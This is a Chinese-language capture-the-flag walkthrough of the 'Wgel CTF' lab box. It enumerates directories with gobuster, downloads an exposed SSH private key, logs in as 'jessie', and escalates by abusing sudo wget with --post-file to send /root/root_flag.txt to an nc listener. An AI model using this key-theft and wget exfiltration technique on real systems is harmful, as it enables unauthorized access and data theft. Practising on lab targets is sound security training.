Wgel CTF
靶机简介:您可以渗出根标志吗?
靶机标签:security
Nmap扫描开放端口
开放了80,22
访问80端口,apache默认页面
用dirbuster扫描网站目录,访问了各个目录也没有发现可利用点。
肯定还有目录没有扫出来
gobuster dir -u http://10.10.237.25/sitemap -w /usr/share/wordlists/dirb/common.txt -x "html,php,txt"
扫出一个ssh私钥目录 /.ssh
root@kali:~# gobuster dir -u http://10.10.228.218/sitemap/ -w /usr/share/wordlists/dirb/common.txt -x "html,php,txt"
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.228.218/sitemap/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
2020/07/10 15:08:36 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.php (Status: 403)
/.hta.txt (Status: 403)
/.hta.html (Status: 403)
/.htaccess (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.ssh (Status: 301)
/about.html (Status: 200)
/blog.html (Status: 200)
/contact.html (Status: 200)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/js (Status: 301)
/services.html (Status: 200)
/shop.html (Status: 200)
/work.html (Status: 200)
===============================================================
2020/07/10 15:13:17 Finished
===============================================================
root@kali:~#
访问一下
用wget下载私钥,复制的不行
wget http://10.10.228.218/sitemap/.ssh/id_rsa
有了私钥但是没有用户名 - -
找了半天,再apache默认页面的html注释中找到了一个jessie的用户名
尝试登录ssh,登录前要把私钥的权限改为600 所有者读写权限
chmod 600 id_rsa
ssh -i id_rsa jessie@10.10.228.218
进来就找user flag
find / -type f -name "*user*" 2</dev/null
发现user_flag.txt
提权
sudo -l 发现只有一个wget 命令 (忘记截图了)
可以用wget的--post-file参数把root_flag.txt (我猜是这么命名的)发送到指定ip
nc监听端口
nc -lvp 80
sudo /usr/bin/wget --post-file=/root/root_flag.txt 10.1.87.167
成功弹回flag